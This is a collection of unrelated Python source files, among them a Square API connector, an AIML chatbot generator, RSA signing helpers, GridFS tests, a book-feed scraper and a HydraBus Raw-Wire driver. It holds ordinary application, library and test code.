params_payload = params_payload or {}
params_payload["limit"] = self.items_per_page_limit
return params_payload
# This stream is tricky because once in a while it returns 404 error 'Not Found for url'.
# Thus the retry strategy was implemented.
def should_retry(self, response: requests.Response) -> bool:
return response.status_code == 404 or super().should_retry(response)
def backoff_time(self, response: requests.Response) -> Optional[float]:
return 3
class Customers(SquareStreamPageParam):
""" Docs: https://developer.squareup.com/reference/square_2021-06-16/customers-api/list-customers """
data_field = "customers"
def path(self, **kwargs) -> str:
return "customers"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params_payload = super().request_params(**kwargs)
params_payload = params_payload or {}
params_payload["sort_order"] = "ASC"
params_payload["sort_field"] = "CREATED_AT"
return params_payload
class Orders(SquareStreamPageJson):
""" Docs: https://developer.squareup.com/reference/square/orders-api/search-orders """
data_field = "orders"
http_method = "POST"
items_per_page_limit = 500
# There is a restriction in the documentation where only 10 locations can be sent in one request
# https://developer.squareup.com/reference/square/orders-api/search-orders#request__property-location_ids
locations_per_requets = 10
def path(self, **kwargs) -> str:
return "orders/search"
def request_body_json(self, stream_slice: Mapping[str, Any] = None, **kwargs) -> Optional[Mapping]:
json_payload = super().request_body_json(stream_slice=stream_slice, **kwargs)
json_payload = json_payload or {}
if stream_slice:
json_payload.update(stream_slice)
json_payload["limit"] = self.items_per_page_limit
return json_payload
def stream_slices(self, **kwargs) -> Iterable[Optional[Mapping[str, Any]]]:
locations_stream = Locations(
authenticator=self.authenticator,
is_sandbox=self.is_sandbox,
api_version=self.api_version,
start_date=self.start_date,
include_deleted_objects=self.include_deleted_objects,
)
locations_records = locations_stream.read_records(sync_mode=SyncMode.full_refresh)
location_ids = [location["id"] for location in locations_records]
if not location_ids:
self.logger.error(
"No locations found. Orders cannot be extracted without locations. "
"Check https://developer.squareup.com/explorer/square/locations-api/list-locations"
)
yield from []
separated_locations = separate_items_by_count(location_ids, self.locations_per_requets)
for location in separated_locations:
yield {"location_ids": location}
class SourceSquare(AbstractSource):
api_version = "2021-06-16" # Latest Stable Release
def check_connection(self, logger, config) -> Tuple[bool, any]:
headers = {
"Square-Version": self.api_version,
"Authorization": "Bearer {}".format(config["api_key"]),
"Content-Type": "application/json",
}
url = "https://connect.squareup{}.com/v2/catalog/info".format("sandbox" if config["is_sandbox"] else "")
try:
session = requests.get(url, headers=headers)
session.raise_for_status()
return True, None
except requests.exceptions.RequestException as e:
square_exception = parse_square_error_response(e)
if square_exception:
return False, square_exception.errors[0]["detail"]
return False, e
def streams(self, config: Mapping[str, Any]) -> List[Stream]:
auth = TokenAuthenticator(token=config["api_key"])
args = {
"authenticator": auth,
"is_sandbox": config["is_sandbox"],
"api_version": self.api_version,
"start_date": config["start_date"],
"include_deleted_objects": config["include_deleted_objects"],
}
return [
Items(**args),
Categories(**args),
Discounts(**args),
Taxes(**args),
Locations(**args),
TeamMembers(**args),
TeamMemberWages(**args),
Refunds(**args),
Payments(**args),
Customers(**args),
ModifierList(**args),
Shifts(**args),
Orders(**args),
]
|
from enum import Enum
class KnowledgeBaseFormatException(Exception):
pass
class KnowledgeBaseFormat(Enum):
MODELS = 1
KEYS = 2
|
from xml.etree.ElementTree import Element, SubElement,ElementTree, tostring
import xml.etree.ElementTree as ET
from xml.dom.minidom import parseString
import sys, re
def prettify(elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = tostring(elem, 'utf-8')
reparsed = parseString(rough_string)
return reparsed.toprettyxml(indent="\t")
def writetofile(aiml, name):
n = name + '.aiml'
final = open(n, 'w')
final.write(aiml)
final.close()
#final = ET.ElementTree(aiml)
#final.write(n, encoding='utf-8', xml_declaration=True)
def createAIML(topics):
aiml = Element('aiml')
aiml.set('encoding', 'utf-8')
aiml.set('version', '1.0.1')
for topic in topics:
aiml.append(topic)
return aiml
def changeTopic(name):
think = Element('think')
setname = Element('set')
setname.set('name', 'topic')
setname.text = name
think.append(setname)
return think
def setUserName(name='username'):
think = Element('think')
setname = Element('set')
setname.set('name', 'username')
setname.text = name
think.append(setname)
return think
def listOfTemplates(templates):
random = Element('random')
print("TS>>>>", templates)
for t in templates:
print("TEMPLATE>>>>", t)
child = SubElement(random, 'li')
child.text = t
return random
def createTopic(topicname, categories):
topic = Element('topic')
topic.set('name', topicname)
for cat in categories:
topic.append(cat)
return topic
def srai(theTopic):
srai = Element('srai')
srai.text = theTopic.upper()
return srai
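# makeitThat builds an AIML <that> pattern from the bot's previous response: it drops a
# trailing '?', keeps the trailing run of letters/spaces after the last non-letter character,
# upper-cases it and prefixes ' _ ' as a wildcard; if the whole string is letters/spaces it
# simply upper-cases the full string.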
def makeitThat(string):
if (string[-1] == '?'):
string = string[:-1]
p = re.compile('[a-z]| ', re.IGNORECASE)
that = ''
cut = 0
for l in string[::-1]:
if p.match(l) == None:
cut += 1
break
else:
that += l
if cut == 0:
that = string.upper()
else:
that = ' _ ' + that[::-1].upper()
return that
def createCategory(patterns, templates, that='', top=''):
category = Element('category')
for p in patterns:
pttrn = SubElement(category, 'pattern')
pttrn.text = p
if len(that)!= 0:
tht = SubElement(category, 'that')
tht.text = that
tmpl = Element('template')
if len(templates) >1:
tmpl.append(listOfTemplates(templates))
else:
tmpl.text = templates[0]
if len(top) != 0:
if (top[:7] == 'GODDAMN'):
tmpl.append(changeTopic(top[7:]))
tmpl.append(srai(top))
else:
tmpl.append(changeTopic(top))
category.append(tmpl)
return category
def learnCategory(pattern, templates, setusername=False):
category = Element('category')
pttrn = SubElement(category, 'pattern')
pttrn.text = pattern
tmpl = Element('template')
if setusername == True:
tmpl.append(setUserName())
for f in templates:
tmpl.append(f)
category.append(tmpl)
return category
def generatefile(theTopic):
# --- main category ---
q1 = 'What kind of %s do you like?' % (theTopic)
q2 = 'Tell me something about %s ' % (theTopic)
q3 = 'What is the best thing about %s ?' % (theTopic)
#q4 = 'I love this topic, how long have you been interested in %s ?' % (theTopic)
questions = [q1, q2, q3]
c0 = createCategory(['GODDAMN'+theTopic.upper()], questions)
# --- subcategories ---
r1 = 'Aww! cute :3 what kind of %s do you think I like?' % (theTopic)
r2 = 'Cool. That is interesting. Do you have any %s ?' % (theTopic)
r3 = 'Well, maybe you are right. I wish I could be a %s :( What would you do first if you turned into a %s ?' % (theTopic, theTopic)
#r4 = 'Not bad. Are you also interested in ANOTHERTOPIC ?' # ????????????
c1 = createCategory(['*'], [r1], makeitThat(q1), 'kindof')
c2 = createCategory(['*'], [r2], makeitThat(q2), 'userhas')
c3 = createCategory(['*'], [r3], makeitThat(q3), 'ifyouwere')
# workaround :3
c11 = createCategory(['*'], [r1], '_ ' + makeitThat(q1), 'kindof')
c21 = createCategory(['*'], [r2], '_ ' + makeitThat(q2), 'userhas')
c31 = createCategory(['*'], [r3], '_ ' + makeitThat(q3), 'ifyouwere')
#c4 = createCategory([' * BEEN * '], r4, q4.upper()) # !!
mainTopic = createTopic(theTopic.upper(), [c0, c1, c2, c3, c11, c21, c31])
# --- subtopics ---
subtopicsCats = []
kindofCategory = createCategory(['*'], ['You are right. How did you know that?'], makeitThat(r1), 'GODDAMN'+theTopic)
kindof = createTopic('KINDOF', [kindofCategory])
# this sucks. @TODO: stick them all together!
userhasPatterns11 = ['YES', 'I DO', 'YEAH', 'YEP', ' * YES * ', ' * I DO * ', ' * YEAH *', ' * YEP * ', ' * YES', ' * I DO', ' * YEAH', ' * YEP', 'YES * ', 'I DO * ', 'YEAH *', 'YEP * '] # sorry mom
userhasPatterns1 = [' * YES * ']
for c in userhasPatterns11:
subtopicsCats.append(createCategory([c], ['How lucky you are! I wish I had that too.'], makeitThat(r2), 'GODDAMN'+theTopic))
userhasPatterns22 = ['NO', 'NOPE', ' * NO * ', ' * NOPE * ', 'NO * ', 'NOPE * ', ' * NO', ' * NOPE'] # ugly workarounds! i will change this someday
userhasPatterns2 = [' * NO * ']
for c in userhasPatterns22:
subtopicsCats.append(createCategory([c], ['Oh poor, I do.'], makeitThat(r2), 'GODDAMN'+theTopic))
userhasPatterns33 = ['MAYBE', 'MIGHT', ' * MAYBE * ', ' * MIGHT * ', 'MAYBE * ', 'MIGHT * ', ' * MAYBE', ' * MIGHT']
userhasPatterns3 = [' * MAYBE * ']
for c in userhasPatterns33:
subtopicsCats.append(createCategory([c], ['Well that is OK! Tell me more about things like this.'], makeitThat(r2), 'GODDAMN'+theTopic))
userhas = createTopic('USERHAS', subtopicsCats)
ifyouwereCatefory = createCategory(['*'], ['...blah blah ... :)'], makeitThat(r3), 'GODDAMN'+theTopic)
ifyouwere = createTopic('IFYOUWERE', [ifyouwereCatefory])
aimlfile = createAIML([mainTopic, kindof, userhas, ifyouwere])
writetofile(prettify(aimlfile), theTopic)
#print(">>>>", prettify(aimlfile))
|
from __future__ import annotations
from typing import Optional
from asn1crypto import keys, pem
from ... import hashes
from ...padding import pss
from ...padding.v15 import enc_digestinfo, pad_pkcs1_v15
from ...public import key, rsa
from ..hashlib import HashlibHash
class PartialRsaPublicKey(rsa.RsaPublicKey):
def export_public_der(self) -> bytes:
return keys.PublicKeyInfo.wrap(
keys.RSAPublicKey({"modulus": self.modulus, "public_exponent": self.public_exponent}), "rsa"
).dump()
def export_public_pem(self) -> str:
return pem.armor("PUBLIC KEY", self.export_public_der()).decode()
def export_public_openssh(self) -> str:
raise NotImplementedError()
class PartialRsaPrivateKey(rsa.RsaPrivateKey):
def export_private_der(self) -> bytes:
raise NotImplementedError()
def export_private_pem(self) -> str:
raise NotImplementedError()
def export_private_openssh(self) -> str:
raise NotImplementedError()
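# Subclasses must override at least one of sign_int / sign_bytes; the identity checks in
# both methods detect when the other has not been overridden and raise instead of
# recursing into each other forever.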
async def sign_int(self, msg: int, meta: Optional[rsa.RsaSignatureMetadata] = None) -> rsa.RsaSignature:
if self.__class__.sign_bytes is PartialRsaPrivateKey.sign_bytes:
raise NotImplementedError
return await self.sign_bytes(rsa.i2osp(msg, self.public.modlen), meta)
async def sign_bytes(self, msg: bytes, meta: Optional[rsa.RsaSignatureMetadata] = None) -> rsa.RsaSignature:
if self.__class__.sign_int is PartialRsaPrivateKey.sign_int:
raise NotImplementedError
return await self.sign_int(rsa.os2ip(msg), meta)
async def sign_v15_raw(
self, msg: bytes, meta: Optional[rsa.RsaSignatureMetadata] = None
) -> rsa.RsaSignature:
return await self.sign_bytes(
pad_pkcs1_v15(msg, self.public.modlen),
meta or rsa.RsaSignatureMetadata(rsa.AsymmetricAlgorithm.RSA, rsa.RsaScheme.PKCS1v1_5_RAW),
)
async def sign_v15_digest(self, dgst: hashes.MessageDigest) -> rsa.RsaSignature:
return await self.sign_v15_raw(
enc_digestinfo(dgst),
rsa.RsaV15Metadata(key.AsymmetricAlgorithm.RSA, rsa.RsaScheme.PKCS1v1_5, dgst.algorithm),
)
async def sign_v15(self, msg: bytes, hash_alg: Optional[hashes.HashAlgorithm] = None) -> rsa.RsaSignature:
dgst = HashlibHash.hash(hash_alg or self.default_hash_algorithm, msg)
return await self.sign_v15_digest(dgst)
async def sign_pss_digest(
self, dgst: hashes.MessageDigest, options: Optional[rsa.PssOptions] = None
) -> rsa.RsaSignature:
opt = options or self.default_pss_options
padded, meta = pss.pad_pss(self.public, self.default_hash_algorithm, dgst, opt)
return await self.sign_bytes(padded, meta)
async def sign_pss(self, msg: bytes, options: Optional[rsa.PssOptions] = None) -> rsa.RsaSignature:
# EMSA-PSS encoding, hash the message first (RFC 8017, section 9.1.1, steps 1-2)
opt = options or self.default_pss_options
hash_alg = opt and opt.hash_alg or self.default_hash_algorithm
dgst = HashlibHash.hash(hash_alg, msg)
return await self.sign_pss_digest(dgst, opt)
async def sign_digest(self, digest: hashes.MessageDigest) -> rsa.RsaSignature:
if self.default_scheme == rsa.RsaScheme.PSS:
return await self.sign_pss_digest(digest)
if self.default_scheme == rsa.RsaScheme.PKCS1v1_5:
return await self.sign_v15_digest(digest)
raise Exception(f"Bad default scheme: {self.default_scheme}")
async def sign(self, msg: bytes) -> rsa.RsaSignature:
if self.default_scheme == rsa.RsaScheme.PSS:
return await self.sign_pss(msg)
if self.default_scheme == rsa.RsaScheme.PKCS1v1_5:
return await self.sign_v15(msg)
raise Exception(f"Bad default scheme: {self.default_scheme}")
|
from django.core.exceptions import PermissionDenied
from functools import wraps
def ajax_login_required(view):
@wraps(view)
def wrapper(request, *args, **kwargs):
if not request.user.is_authenticated():
raise PermissionDenied
return view(request, *args, **kwargs)
return wrapper
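# Usage sketch (illustrative -- my_ajax_view and its JsonResponse payload are placeholders):
#
#   from django.http import JsonResponse
#
#   @ajax_login_required
#   def my_ajax_view(request):
#       return JsonResponse({'ok': True})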
|
from distutils.core import setup
setup(
name="repless",
version='0.1.0',
author="VulcanoAhab",
packages=["repless/aws_peices", "repless/fab_shorts"],
url="https://github.com/VulcanoAhab/repless.git",
description="Severless Utils",
install_requires=[
]
)
|
import sys
val1 = sys.argv[0]
val2 = len(sys.argv)
val3 = str(sys.argv)
print("nombre script: {}".format(val1))
print("cantidad de val3: {}".format(val2))
print("lista de val3: {}" .format(val3))
|
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Periodic Discovery Job
# ---------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
from __future__ import absolute_import
import random
# NOC modules
from noc.services.discovery.jobs.base import MODiscoveryJob
from noc.core.span import Span
from noc.core.datastream.change import bulk_datastream_changes
from ..box.resolver import ResolverCheck
from .uptime import UptimeCheck
from .interfacestatus import InterfaceStatusCheck
from .mac import MACCheck
from .metrics import MetricsCheck
from .cpestatus import CPEStatusCheck
class PeriodicDiscoveryJob(MODiscoveryJob):
name = "periodic"
umbrella_cls = "Discovery | Job | Periodic"
# Store context
context_version = 1
is_periodic = True
default_contexts = ("counters", "metric_windows", "active_thresholds")
def handler(self, **kwargs):
with Span(sample=self.object.periodic_telemetry_sample), bulk_datastream_changes():
if self.object.auth_profile and self.object.auth_profile.type == "S":
self.logger.info("Invalid credentials. Stopping")
return
ResolverCheck(self).run()
if self.allow_sessions():
self.logger.debug("Using CLI sessions")
with self.object.open_session():
self.run_checks()
else:
self.run_checks()
def run_checks(self):
if self.object.object_profile.enable_periodic_discovery_uptime:
UptimeCheck(self).run()
if self.object.object_profile.enable_periodic_discovery_interface_status:
InterfaceStatusCheck(self).run()
if self.object.object_profile.enable_periodic_discovery_cpestatus:
CPEStatusCheck(self).run()
if self.object.object_profile.enable_periodic_discovery_mac:
MACCheck(self).run()
if self.object.object_profile.enable_periodic_discovery_metrics:
MetricsCheck(self).run()
def get_running_policy(self):
return self.object.get_effective_periodic_discovery_running_policy()
def can_run(self):
return (
super(PeriodicDiscoveryJob, self).can_run()
and self.object.object_profile.enable_periodic_discovery
and self.object.object_profile.periodic_discovery_interval
)
def get_interval(self):
if self.object:
return self.object.object_profile.periodic_discovery_interval
else:
# Dereference error
return random.randint(60, 120)
def get_failed_interval(self):
return self.object.object_profile.periodic_discovery_interval
def can_update_alarms(self):
return self.object.can_create_periodic_alarms()
def get_fatal_alarm_weight(self):
return self.object.object_profile.periodic_discovery_fatal_alarm_weight
def get_alarm_weight(self):
return self.object.object_profile.periodic_discovery_alarm_weight
|
# Copyright 2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test GridFSBucket class."""
import copy
import datetime
import os
import re
import sys
from json import loads
sys.path[0:0] = [""]
from bson import Binary
from bson.int64 import Int64
from bson.json_util import object_hook
import gridfs
from gridfs.errors import NoFile, CorruptGridFile
from test import (unittest,
IntegrationTest)
# Commands.
_COMMANDS = {"delete": lambda coll, doc: [coll.delete_many(d["q"])
for d in doc['deletes']],
"insert": lambda coll, doc: coll.insert_many(doc['documents']),
"update": lambda coll, doc: [coll.update_many(u["q"], u["u"])
for u in doc['updates']]
}
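# Each entry maps a write-command name from the spec files to the equivalent pymongo
# collection call used to apply it while arranging test data and asserting outcomes.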
# Location of JSON test specifications.
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'gridfs')
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case. Special case for _id.
if camel == "id":
return "file_id"
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
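# Illustrative checks (not part of the original spec tests): the converter maps the
# spec's camelCase argument names onto PyMongo's snake_case names.
assert camel_to_snake("chunkSizeBytes") == "chunk_size_bytes"
assert camel_to_snake("id") == "file_id"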
class TestAllScenarios(IntegrationTest):
@classmethod
def setUpClass(cls):
super(TestAllScenarios, cls).setUpClass()
cls.fs = gridfs.GridFSBucket(cls.db)
cls.str_to_cmd = {
"upload": cls.fs.upload_from_stream,
"download": cls.fs.open_download_stream,
"delete": cls.fs.delete,
"download_by_name": cls.fs.open_download_stream_by_name}
def init_db(self, data, test):
self.cleanup_colls(self.db.fs.files, self.db.fs.chunks,
self.db.expected.files, self.db.expected.chunks)
# Read in data.
if data['files']:
self.db.fs.files.insert_many(data['files'])
self.db.expected.files.insert_many(data['files'])
if data['chunks']:
self.db.fs.chunks.insert_many(data['chunks'])
self.db.expected.chunks.insert_many(data['chunks'])
# Make initial modifications.
if "arrange" in test:
for cmd in test['arrange'].get('data', []):
for key in cmd.keys():
if key in _COMMANDS:
coll = self.db.get_collection(cmd[key])
_COMMANDS[key](coll, cmd)
def init_expected_db(self, test, result):
# Modify outcome DB.
for cmd in test['assert'].get('data', []):
for key in cmd.keys():
if key in _COMMANDS:
# Replace wildcards in inserts.
for doc in cmd.get('documents', []):
keylist = doc.keys()
for dockey in copy.deepcopy(list(keylist)):
if "result" in str(doc[dockey]):
doc[dockey] = result
if "actual" in str(doc[dockey]): # Avoid duplicate
doc.pop(dockey)
# Move contentType to metadata.
if dockey == "contentType":
doc["metadata"] = {dockey: doc.pop(dockey)}
coll = self.db.get_collection(cmd[key])
_COMMANDS[key](coll, cmd)
if test['assert'].get('result') == "&result":
test['assert']['result'] = result
def sorted_list(self, coll, ignore_id):
to_sort = []
for doc in coll.find():
docstr = "{"
if ignore_id: # Cannot compare _id in chunks collection.
doc.pop("_id")
for k in sorted(doc.keys()):
if k == "uploadDate": # Can't compare datetime.
self.assertTrue(isinstance(doc[k], datetime.datetime))
else:
docstr += "%s:%s " % (k, repr(doc[k]))
to_sort.append(docstr + "}")
return to_sort
def create_test(scenario_def):
def run_scenario(self):
# Run tests.
self.assertTrue(scenario_def['tests'], "tests cannot be empty")
for test in scenario_def['tests']:
self.init_db(scenario_def['data'], test)
# Run GridFs Operation.
operation = self.str_to_cmd[test['act']['operation']]
args = test['act']['arguments']
extra_opts = args.pop("options", {})
if "contentType" in extra_opts:
extra_opts["metadata"] = {
"contentType": extra_opts.pop("contentType")}
args.update(extra_opts)
converted_args = dict((camel_to_snake(c), v)
for c, v in args.items())
expect_error = test['assert'].get("error", False)
result = None
error = None
try:
result = operation(**converted_args)
if 'download' in test['act']['operation']:
result = Binary(result.read())
except Exception as exc:
if not expect_error:
raise
error = exc
self.init_expected_db(test, result)
# Asserts.
errors = {"FileNotFound": NoFile,
"ChunkIsMissing": CorruptGridFile,
"ExtraChunk": CorruptGridFile,
"ChunkIsWrongSize": CorruptGridFile,
"RevisionNotFound": NoFile}
if expect_error:
self.assertIsNotNone(error)
self.assertIsInstance(error, errors[test['assert']['error']],
test['description'])
else:
self.assertIsNone(error)
if 'result' in test['assert']:
if test['assert']['result'] == 'void':
test['assert']['result'] = None
self.assertEqual(result, test['assert'].get('result'))
if 'data' in test['assert']:
# Create alphabetized list
self.assertEqual(
set(self.sorted_list(self.db.fs.chunks, True)),
set(self.sorted_list(self.db.expected.chunks, True)))
self.assertEqual(
set(self.sorted_list(self.db.fs.files, False)),
set(self.sorted_list(self.db.expected.files, False)))
return run_scenario
def _object_hook(dct):
if 'length' in dct:
dct['length'] = Int64(dct['length'])
return object_hook(dct)
def create_tests():
for dirpath, _, filenames in os.walk(_TEST_PATH):
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = loads(
scenario_stream.read(), object_hook=_object_hook)
# bson.json_util's object_hook is already applied above, so walk the scenario
# and convert any {'$hex': ...} payloads (stored under keys like 'data',
# 'source' and 'result') into Binary values manually.
def str2hex(jsn):
for key, val in jsn.items():
if key in ("data", "source", "result"):
if "$hex" in val:
jsn[key] = Binary(bytes.fromhex(val['$hex']))
if isinstance(jsn[key], dict):
str2hex(jsn[key])
if isinstance(jsn[key], list):
for k in jsn[key]:
str2hex(k)
str2hex(scenario_def)
# Construct test from scenario.
new_test = create_test(scenario_def)
test_name = 'test_%s' % (
os.path.splitext(filename)[0])
new_test.__name__ = test_name
setattr(TestAllScenarios, new_test.__name__, new_test)
create_tests()
if __name__ == "__main__":
unittest.main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import feedgen.feed
import lxml.html
import re
import selenium
import selenium.webdriver.chrome.options
def magic():
url = 'https://24h.pchome.com.tw/books/store/?q=/R/DJAZ/new'
chrome_options = selenium.webdriver.chrome.options.Options()
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--headless')
chrome_options.add_argument('--incognito')
chrome_options.binary_location = '/usr/bin/chromium-browser'
b = selenium.webdriver.Chrome(chrome_options=chrome_options)
b.get(url)
html = b.find_element_by_tag_name('html').get_attribute('innerHTML')
b.close()
html = lxml.html.fromstring(html)
title = html.cssselect('title')[0].text_content()
feed = feedgen.feed.FeedGenerator()
feed.author({'name': 'PChome 24h Feed Generator'})
feed.id(url)
feed.link(href=url, rel='alternate')
feed.title(title)
for item in html.cssselect('#ProdListContainer dl'):
try:
a = item.cssselect('.prod_name a')[0]
book_name = a.text_content()
book_url = a.get('href')
if re.match('//', book_url):
book_url = 'https:' + book_url
item_txt = item.text_content()
book_date = re.search(r'出版日:\s*(\S+)', item_txt, re.M)[1]
book_publisher = re.search(r'出版社:\s*(\S+)', item_txt, re.M)[1]
k = '%s - %s - %s' % (book_name, book_publisher, book_date)
entry = feed.add_entry()
entry.id(book_url)
entry.title(k)
entry.link(href=book_url)
except IndexError:
pass
print(str(feed.atom_str(), 'utf-8'))
if __name__ == '__main__':
magic()
|
import time
import numba
import numpy as np
@numba.jit(numba.uint8(numba.complex64, numba.complex64))
def cnt(z, c):
k = 0
while k < 100:
z = z * z + c
if z.real**2 + z.imag**2 > 4:
break
k += 1
return k
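# Quick illustrative checks: a point that never escapes returns the full count of 100,
# while a point far outside the set escapes immediately and returns 0.
assert cnt(complex(0.0, 0.0), complex(0.0, 0.0)) == 100
assert cnt(complex(0.0, 0.0), complex(2.0, 2.0)) == 0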
@numba.jit
def mand(M, N):
init_z = complex(0.0, 0.0)
grid = np.empty((M, N), dtype=np.uint8)
xs = np.linspace(-2, 2, N)
ys = np.linspace(-2, 2, M)
for j, y in enumerate(ys):
for i, x in enumerate(xs):
grid[j, i] = cnt(init_z, complex(x, y))
return grid
def main():
s = time.time()
M = N = 2500
grid = mand(M, N)
e = time.time()
elapsed = f"elapsed time {e-s}"
np.savetxt("result.txt", grid, fmt="%d", delimiter=',')
return elapsed
print(main())
|
# Copyright 2019 Nicolas OBERLI
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from .protocol import Protocol
from .common import split
class RawWire(Protocol):
"""
Raw wire protocol handler
:example:
>>> import pyHydrabus
>>> r=pyHydrabus.RawWire('/dev/hydrabus')
>>> # Set SDA to high
>>> r.sda = 1
>>> # Send two clock ticks
>>> r.clocks(2)
>>> # Read two bytes
>>> data = r.read(2)
"""
__RAWWIRE_DEFAULT_CONFIG = 0b000
def __init__(self, port=""):
self._config = self.__RAWWIRE_DEFAULT_CONFIG
self._clk = 0
self._sda = 0
super().__init__(name=b"RAW1", fname="Raw-Wire", mode_byte=b"\x05", port=port)
self._configure_port()
def read_bit(self):
"""
Sends a clock tick, and return the read bit value
"""
CMD = 0b00000111
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
return self._hydrabus.read(1)
def read_byte(self):
"""
Read a byte from the raw wire
:return: The read byte
:rtype: bytes
"""
CMD = 0b00000110
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
return self._hydrabus.read(1)
def clock(self):
"""
Send a clock tick
"""
CMD = 0b00001001
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
return True
else:
self._logger.error("Error setting pin.")
return False
def bulk_ticks(self, num):
"""
Sends a bulk of clock ticks (1 to 16)
https://github.com/hydrabus/hydrafw/wiki/HydraFW-binary-raw-wire-mode-guide#bulk-clock-ticks-0b0010xxxx
:param num: Number of clock ticks to send
:type num: int
"""
if not num > 0:
raise ValueError("Send at least one clock tick")
if not num <= 16:
raise ValueError("Too many ticks to send")
CMD = 0b00100000
CMD = CMD | (num - 1)
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
return True
else:
self._logger.error("Error sending clocks.")
return False
def clocks(self, num):
"""
Sends a number of clock ticks
:param num: Number of clock ticks to send
:type num: int
"""
if not num > 0:
raise ValueError("Must be a positive integer")
while num > 16:
self.bulk_ticks(16)
num = num - 16
self.bulk_ticks(num)
def bulk_write(self, data=b""):
"""
Bulk write on Raw-Wire
https://github.com/hydrabus/hydrafw/wiki/HydraFW-binary-raw-wire-mode-guide#bulk-raw-wire-transfer-0b0001xxxx
Parameters:
:param data: Data to be sent
:type data: bytes
"""
CMD = 0b00010000
if not len(data) > 0:
raise ValueError("Send at least one byte")
if not len(data) <= 16:
raise ValueError("Too many bytes to write")
CMD = CMD | (len(data) - 1)
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
self._hydrabus.write(data)
if self._hydrabus.read(1) != b"\x01":
self._logger.warning("Unknown error.")
return self._hydrabus.read(len(data))
def set_speed(self, speed):
"""
Sets the clock max speed.
:param speed: speed in Hz. Possible values: 5000, 50000, 100000, 1000000
"""
speeds = {5000: 0b00, 50000: 0b01, 100_000: 0b10, 1_000_000: 0b11}
if speed not in speeds.keys():
raise ValueError(f"Incorrect value. use {speeds.keys()}")
CMD = 0b01100000
CMD = CMD | speeds[speed]
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
return True
else:
self._logger.error("Error setting speed.")
return False
def _configure_port(self):
CMD = 0b10000000
CMD = CMD | self._config
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
return True
else:
self._logger.error("Error setting config.")
return False
def write(self, data=b""):
"""
Write on Raw-Wire bus
:param data: data to be sent
:type data: bytes
:return: Read bytes
:rtype: bytes
"""
result = b""
for chunk in split(data, 16):
result += self.bulk_write(chunk)
return result
def read(self, length=0):
"""
Read on Raw-Wire bus
:param length: Number of bytes to read
:type length: int
:return: Read data
:rtype: bytes
"""
result = b""
for _ in range(length):
result += self.read_byte()
return result
@property
def clk(self):
"""
CLK pin status
"""
return self._clk
@clk.setter
def clk(self, value):
value = value & 1
CMD = 0b00001010
CMD = CMD | value
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
self._clk = value
return True
else:
self._logger.error("Error setting pin.")
return False
@property
def sda(self):
"""
SDA pin status
"""
CMD = 0b00001000
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
return int.from_bytes(self._hydrabus.read(1), byteorder="big")
@sda.setter
def sda(self, value):
value = value & 1
CMD = 0b00001100
CMD = CMD | value
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
self._sda = value
return True
else:
self._logger.error("Error setting pin.")
return False
@property
def wires(self):
"""
Raw-Wire mode (2=2-Wire, 3=3-Wire)
"""
if self._config & 0b100 == 0:
return 2
else:
return 3
@wires.setter
def wires(self, value):
if value == 2:
self._config = self._config & ~(1 << 2)
self._configure_port()
return True
elif value == 3:
self._config = self._config | (1 << 2)
self._configure_port()
return True
else:
self._logger.error("Incorrect value. Must be 2 or 3")
@property
def gpio_mode(self):
"""
Raw-Wire GPIO mode (0=Push-Pull, 1=Open Drain)
"""
return (self._config & 0b1000) >> 3
@gpio_mode.setter
def gpio_mode(self, value):
if value == 0:
self._config = self._config & ~(1 << 3)
self._configure_port()
return True
elif value == 1:
self._config = self._config | (1 << 3)
self._configure_port()
return True
else:
self._logger.error("Incorrect value. Must be 0 or 1")
|
import json
from typing import Optional
def read_content() -> dict:
try:
with open(r"storage/PasswordVault.txt", "r") as file:
obj = json.load(file)
return obj
except json.decoder.JSONDecodeError:
with open(r"storage/PasswordVault.txt", "w") as file:
obj = json.dumps({}, indent=4)
file.write(obj)
return read_content()
def write_content(data: dict) -> Optional[bool]:
try:
with open(r"storage/PasswordVault.txt", "w") as file:
obj = json.dumps(data, indent= 4)
file.write(obj)
return True
except FileNotFoundError:
return
def clean_file() -> None:
return open(r"storage/PasswordVault.txt", "w").close()
if __name__ == "__main__":
clean_file()
|
# -*- encoding: utf-8 -*-
"""
Created by Ênio Viana at 22/09/2021 at 23:09:27
Project: py_dss_tools [set, 2021]
"""
class PriceShape:
name = "PriceShape"
